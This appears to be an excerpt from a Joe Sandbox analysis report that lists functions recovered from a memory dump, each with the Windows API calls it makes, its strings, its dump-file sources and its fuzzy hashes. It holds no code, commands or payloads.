                                                                                          Function 005CC530 Relevance: 10.7, APIs: 5, Strings: 1, Instructions: 156COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104), ref: 005CC611
                                                                                          • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 005CC6DE
                                                                                          • GetSaveFileNameW.COMDLG32(00000058), ref: 005CC6EF
                                                                                          • GetOpenFileNameW.COMDLG32(00000058), ref: 005CC6FE
                                                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 005CC70D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CurrentDirectoryFileName$EnvironmentExpandOpenSaveStrings
                                                                                          • String ID: X
                                                                                          • API String ID: 2132094761-3081909835
                                                                                          • Opcode ID: d6232908509c9dea64b53938bd6546b421a7aa8086d0f97150974c17ac34e25c
                                                                                          • Instruction ID: c6f98d2eb79cba9999e9fd0c1ac518144981ca80f1c4eca1d217a47dda4e05e6
                                                                                          • Opcode Fuzzy Hash: d6232908509c9dea64b53938bd6546b421a7aa8086d0f97150974c17ac34e25c
                                                                                          • Instruction Fuzzy Hash: 185172B1E002189FDB24DF65DC85B9ABBB8FF48314F044199EA0DA7241EB70AE84CF54
                                                                                          Function 005C8BC0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 148COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetModuleFileNameW.KERNEL32(00000000,?,00000104), ref: 005C8C1C
                                                                                          • SHGetFolderPathW.SHFOLDER(00000000,00000026,00000000,00000000,?,?,?), ref: 005C8C5F
                                                                                          • SHGetFolderPathW.SHFOLDER(00000000,0000001A,00000000,00000000,?), ref: 005C8CB7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FolderPath$FileModuleName
                                                                                          • String ID: ..\CTL32\util.cpp$FALSE || !"wrong nsmdir"$nsmdir < GP_MAX
                                                                                          • API String ID: 906376703-468948282
                                                                                          • Opcode ID: 86d9f51943ed7415f7a68809958844be2309fd6b5423aa870236076e363b8152
                                                                                          • Instruction ID: 039e630991dbc97e16de46e96efd7a64ea153d540b7b6a4f90736d442baaf23c
                                                                                          • Opcode Fuzzy Hash: 86d9f51943ed7415f7a68809958844be2309fd6b5423aa870236076e363b8152
                                                                                          • Instruction Fuzzy Hash: 434128B19012099BCB249BA49C56FFB7B65FFD0310F158669ED16A72C1EF305E40CBA1
                                                                                          Function 005AC680 Relevance: 10.6, APIs: 1, Strings: 5, Instructions: 130COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf
                                                                                          • String ID: Local\$already created$already opened$name too long$:Y
                                                                                          • API String ID: 2111968516-3449878884
                                                                                          • Opcode ID: 0a7da1489882f5de14aab9560a0b35983039d85c70978a35194c8cc3af30fba8
                                                                                          • Instruction ID: 5b147164958df408e2cfb7eb1b05fdc8da98516eb9739590f412d88894f9ac7c
                                                                                          • Opcode Fuzzy Hash: 0a7da1489882f5de14aab9560a0b35983039d85c70978a35194c8cc3af30fba8
                                                                                          • Instruction Fuzzy Hash: 0C41A931A442095BCB289F68C9567FFBFA1FF96710F0481ADEA469B281EB705D44CBD0
                                                                                          Function 005E2800 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 118libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetProcAddress.KERNEL32(?,GetNamedSecurityInfoW), ref: 005E284C
                                                                                          • DeleteAce.ADVAPI32(00000104,00000000), ref: 005E28B6
                                                                                          • GetProcAddress.KERNEL32(00000104,SetNamedSecurityInfoW), ref: 005E28D7
                                                                                          • LocalFree.KERNEL32(?), ref: 005E291E
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressProc$DeleteFreeLocal
                                                                                          • String ID: GetNamedSecurityInfoW$SetNamedSecurityInfoW
                                                                                          • API String ID: 1412278368-2573761906
                                                                                          • Opcode ID: 78e539f67f7c6007df66fcbe908bfd8e15ed6c43cf8fd70255d916ac19900d5d
                                                                                          • Instruction ID: 582f9cb4ba29c77902ab46eb1ebf6d4e725dc7c7959993393df0bc08046418c8
                                                                                          • Opcode Fuzzy Hash: 78e539f67f7c6007df66fcbe908bfd8e15ed6c43cf8fd70255d916ac19900d5d
                                                                                          • Instruction Fuzzy Hash: 17319371A40304ABDB24DF69CC85F9ABBE9FF48751F108419F985EB281D670AD40CBA0
                                                                                          Function 0059A0D0 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 105libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • LoadLibraryW.KERNEL32(newdev.dll,DE64E134), ref: 0059A123
                                                                                          • GetProcAddress.KERNEL32(00000000,UpdateDriverForPlugAndPlayDevicesW), ref: 0059A135
                                                                                          • FreeLibrary.KERNEL32(00000000), ref: 0059A146
                                                                                          • GetLastError.KERNEL32 ref: 0059A1DC
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Library$AddressErrorFreeLastLoadProc
                                                                                          • String ID: UpdateDriverForPlugAndPlayDevicesW$newdev.dll
                                                                                          • API String ID: 2540614322-3767700378
                                                                                          • Opcode ID: 6559fe9c19cb7155df0b1f1be675f6a16627aabb95e91146c74bff81ee4e3176
                                                                                          • Instruction ID: 98008ec22ef8cdb51ff6866470e2600d76b025429e55eee112f3d964f15100dd
                                                                                          • Opcode Fuzzy Hash: 6559fe9c19cb7155df0b1f1be675f6a16627aabb95e91146c74bff81ee4e3176
                                                                                          • Instruction Fuzzy Hash: 8641A575A006199FCB24DF28CC98BAAB7B5FF88710F148199E81A97350DB349E41CFA1
                                                                                          Function 005D2F14 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 100COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • MoveFileExW.KERNEL32(?,?,00000000), ref: 005D2FB6
                                                                                          • MoveFileExW.KERNEL32(?,?,00000001), ref: 005D2FE0
                                                                                          • MoveFileExW.KERNEL32(?,?,00000001), ref: 005D3053
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: FileMove
                                                                                          • String ID: .dll$.old$.org
                                                                                          • API String ID: 3562171763-1297993771
                                                                                          • Opcode ID: f0d5ac0ee7340b2252f8aff245109789d5bc2d3a8092e4bfb29b2e4f38c47c41
                                                                                          • Instruction ID: 7d125ada4ede50f091680fcadc2d83e30c12b699883430b11ccd4dfa2ad52d7c
                                                                                          • Opcode Fuzzy Hash: f0d5ac0ee7340b2252f8aff245109789d5bc2d3a8092e4bfb29b2e4f38c47c41
                                                                                          • Instruction Fuzzy Hash: D441E27590420A8ECB30DF58D956BA6B3B5FF99340F058496DE4ACB365F3709E41CB90
                                                                                          Function 005CADB2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91libraryloaderCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 005C92B0: GetVersionExW.KERNEL32(0063BEF0,00000000), ref: 005C92E0
                                                                                            • Part of subcall function 005C92B0: RegOpenKeyExW.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows NT\CurrentVersion,00000000,00000001,?), ref: 005C931F
                                                                                          • GetProcAddress.KERNEL32(?,GetDpiForWindow), ref: 005CAE46
                                                                                          • GetProcAddress.KERNEL32(?,GetDpiForSystem), ref: 005CAE67
                                                                                          • SetLastError.KERNEL32(00000078), ref: 005CAE7C
                                                                                          • FreeLibrary.KERNEL32(?), ref: 005CAE87
                                                                                          • GetDC.USER32(?), ref: 005CAE92
                                                                                          • GetDeviceCaps.GDI32(00000000,00000058), ref: 005CAE9D
                                                                                          • ReleaseDC.USER32(?,00000000), ref: 005CAEA7
                                                                                            • Part of subcall function 005C2030: LoadLibraryW.KERNEL32(User32.dll,00000000,005CAE2C), ref: 005C2038
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: AddressLibraryProc$CapsDeviceErrorFreeLastLoadOpenReleaseVersion
                                                                                          • String ID: GetDpiForWindow
                                                                                          • API String ID: 4015621620-4136707520
                                                                                          • Opcode ID: cc2963cd0a4e767ae3b2cd19c56ebb34f49d4e2e808782fa6c14692d55e149df
                                                                                          • Instruction ID: b2a6327793bdcde7f1c9159764e89f15dfeeea9222610afde39c576fd58cf339
                                                                                          • Opcode Fuzzy Hash: cc2963cd0a4e767ae3b2cd19c56ebb34f49d4e2e808782fa6c14692d55e149df
                                                                                          • Instruction Fuzzy Hash: 8D21A631900214AFD7228B74EC88F9ABF79FB45B15F15456EF806A7281D7344D01CBA1
                                                                                          Function 005BC240 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 84COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • EnterCriticalSection.KERNEL32(0063B71C,?,00000000,DE64E134), ref: 005BC286
                                                                                          • LeaveCriticalSection.KERNEL32(0063B71C,?,00000000,DE64E134), ref: 005BC2D9
                                                                                          • DeleteCriticalSection.KERNEL32(?,DE64E134), ref: 005BC2E6
                                                                                          • DeleteCriticalSection.KERNEL32(0063B71C,?,DE64E134), ref: 005BC305
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: CriticalSection$Delete$EnterLeave
                                                                                          • String ID: ..\CTL32\Refcount.cpp$p < ep
                                                                                          • API String ID: 3104255891-1059512116
                                                                                          • Opcode ID: 1724c5e3dbb14726a967f58815021f12e1cc4edd685f4d880b4ee791f21a977c
                                                                                          • Instruction ID: 4af76b1af67e5b4e0119256446f325314ad08ca193131b9fc2e6ae48e96ea50e
                                                                                          • Opcode Fuzzy Hash: 1724c5e3dbb14726a967f58815021f12e1cc4edd685f4d880b4ee791f21a977c
                                                                                          • Instruction Fuzzy Hash: B921A3769002049FCB10DF94DC46B9ABFFAFB84B10F54552AF95593380D775A800CBE5
                                                                                          Function 005A8B60 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 81registryCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Uninstall,00000000,00020019,?), ref: 005A8B91
                                                                                          • RegEnumKeyExA.ADVAPI32(?,00000000,?,?,00000000,00000000,00000000,?), ref: 005A8BDB
                                                                                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 005A8C02
                                                                                            • Part of subcall function 005A3D80: RegQueryValueExW.ADVAPI32(?,DisplayName,00000000,00000000,?,00000400), ref: 005A3DD2
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005A8C3F
                                                                                            • Part of subcall function 005A6240: RegQueryValueExW.ADVAPI32(?,InstallLocation,00000000,00000000,?,00000400), ref: 005A629C
                                                                                            • Part of subcall function 005A6240: RegQueryValueExW.ADVAPI32(?,DisplayIcon,00000000,00000000,?,00000400), ref: 005A62DA
                                                                                          • RegCloseKey.ADVAPI32(?), ref: 005A8C55
                                                                                          Strings
                                                                                          • Software\Microsoft\Windows\CurrentVersion\Uninstall, xrefs: 005A8B81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: QueryValue$CloseOpen$Enum
                                                                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Uninstall
                                                                                          • API String ID: 2995688569-3722870514
                                                                                          • Opcode ID: 7787767b6a634da9561a63f68f4939ca20a6b024876ceb76a9c4a43a633c81f4
                                                                                          • Instruction ID: 9f2575dbb29be57ff6e63f2f5f421a6a8bf6887317789e9b20b96a8b1bec9b6e
                                                                                          • Opcode Fuzzy Hash: 7787767b6a634da9561a63f68f4939ca20a6b024876ceb76a9c4a43a633c81f4
                                                                                          • Instruction Fuzzy Hash: 7C21B6F5940218ABCB34CB50DC54FEEB779FB89710F044199BB0977240CA309E858FA8
                                                                                          Function 005D50D0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 79windowtimethreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • SendMessageTimeoutW.USER32(?,0000000D,00000100,?,00000002,00000064,?), ref: 005D5111
                                                                                          • GetWindowThreadProcessId.USER32(?,?), ref: 005D5129
                                                                                          • OpenProcess.KERNEL32(00001000,00000000,00000000), ref: 005D5145
                                                                                          • QueryFullProcessImageNameW.KERNEL32(00000000,00000000,?,?), ref: 005D516C
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 005D5173
                                                                                          Strings
                                                                                          • pid=%d, hwnd=%x, fn=%s, title=%s, xrefs: 005D51BC
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Process$CloseFullHandleImageMessageNameOpenQuerySendThreadTimeoutWindow
                                                                                          • String ID: pid=%d, hwnd=%x, fn=%s, title=%s
                                                                                          • API String ID: 3884872023-4264767816
                                                                                          • Opcode ID: 479255f5140d7c5f479a1fb2e887c5d6e6c5c394fbfc28851d32f46ea020646c
                                                                                          • Instruction ID: 66ad274745eb0d9b92cb2e6906c4c15b598815afae41bc7de3bad739aabfdbec
                                                                                          • Opcode Fuzzy Hash: 479255f5140d7c5f479a1fb2e887c5d6e6c5c394fbfc28851d32f46ea020646c
                                                                                          • Instruction Fuzzy Hash: E82171B1900619ABEB309B54CC59FEAB7B9EB44704F0481ABB605A7180E6B05EC5CFA5
                                                                                          Function 005AC2C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 78sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • IsWindow.USER32(?), ref: 005AC2E5
                                                                                          • GetClassNameW.USER32(?,?,00000040), ref: 005AC2F9
                                                                                          • FindWindowW.USER32(?,00000000), ref: 005AC340
                                                                                          • Sleep.KERNEL32(?,?,?), ref: 005AC35C
                                                                                          • FindWindowW.USER32(?,00000000), ref: 005AC370
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Window$Find$ClassNameSleep
                                                                                          • String ID: gfff
                                                                                          • API String ID: 1867012073-1553575800
                                                                                          • Opcode ID: af245a287045e3c2128bb73392aaf29f6568186427ab7a8275c38ec2c1fb2fc2
                                                                                          • Instruction ID: 5c0c7ab9ef1ed604d2805c3268306ceea3ca727be3e73e43d2262c40f509c783
                                                                                          • Opcode Fuzzy Hash: af245a287045e3c2128bb73392aaf29f6568186427ab7a8275c38ec2c1fb2fc2
                                                                                          • Instruction Fuzzy Hash: 7921D372A00615ABDF208F66DC84BEEBBA9BB45750F08C056F908D7240DB30ED458BE1
                                                                                          Function 005C26E0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 75windowCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • GetSysColor.USER32(0000000F), ref: 005C2739
                                                                                          • GetSysColor.USER32(00000014), ref: 005C2750
                                                                                          • GetDC.USER32(00000000), ref: 005C2789
                                                                                          • CreateDIBitmap.GDI32(00000000,00000028,00000004,?,00000028,00000000), ref: 005C27A4
                                                                                          • ReleaseDC.USER32(00000000,00000000), ref: 005C27AF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: Color$BitmapCreateRelease
                                                                                          • String ID: (
                                                                                          • API String ID: 1671621915-3887548279
                                                                                          • Opcode ID: b0e18b9ebd2bbd70300398b7a6c05b9b922c1689bec62033f1854ec9dba683bc
                                                                                          • Instruction ID: 07b30743f479c0c5ac01e470fe99703b7b63b82370642059e26d516aae7ea29c
                                                                                          • Opcode Fuzzy Hash: b0e18b9ebd2bbd70300398b7a6c05b9b922c1689bec62033f1854ec9dba683bc
                                                                                          • Instruction Fuzzy Hash: CC217E71E052489FDB14DBB99C05BDEBBF5AB88300F0080AEE548EB381DA755A04CFA5
                                                                                          Function 005AC500 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 72COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000019.00000002.114141683351.0000000000591000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00590000, based on PE: true
                                                                                          • Associated: 00000019.00000002.114141614342.0000000000590000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141841666.0000000000619000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000637000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.000000000063B000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114141900263.0000000000642000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                          • Associated: 00000019.00000002.114142030418.0000000000645000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_25_2_590000_MSIF373.jbxd
                                                                                          Yara matches
                                                                                          Similarity
                                                                                          • API ID: wsprintf
                                                                                          • String ID: %s_%08x%08x$:Y
                                                                                          • API String ID: 2111968516-2700986899
                                                                                          • Opcode ID: 7ff11037695d9bf7e54a16e9c064f77384a4c228bd34366602764855417b24e6
                                                                                          • Instruction ID: 4d68b6975e799e45b1d4b856935dbe3d46ae1b8547d348aa87278d7fc5cdd9ed
                                                                                          • Opcode Fuzzy Hash: 7ff11037695d9bf7e54a16e9c064f77384a4c228bd34366602764855417b24e6
                                                                                          • Instruction Fuzzy Hash: 2B2127B5B00109AF8B04DF99CC41CAFBBBDEF8C220B248159FD09DB351D671AC428BA0
                                                                                          Function 005B4090 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 68COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • IsWindow.USER32(?), ref: 005B4099
                                                                                          • LoadCursorW.USER32(00000000,00007F00), ref: 005B410D
                                                                                          • SetCursor.USER32(00000000), ref: 005B4114
                                                                                            • Part of subcall function 005B3F70: IsWindow.USER32(?), ref: 005B3F7D
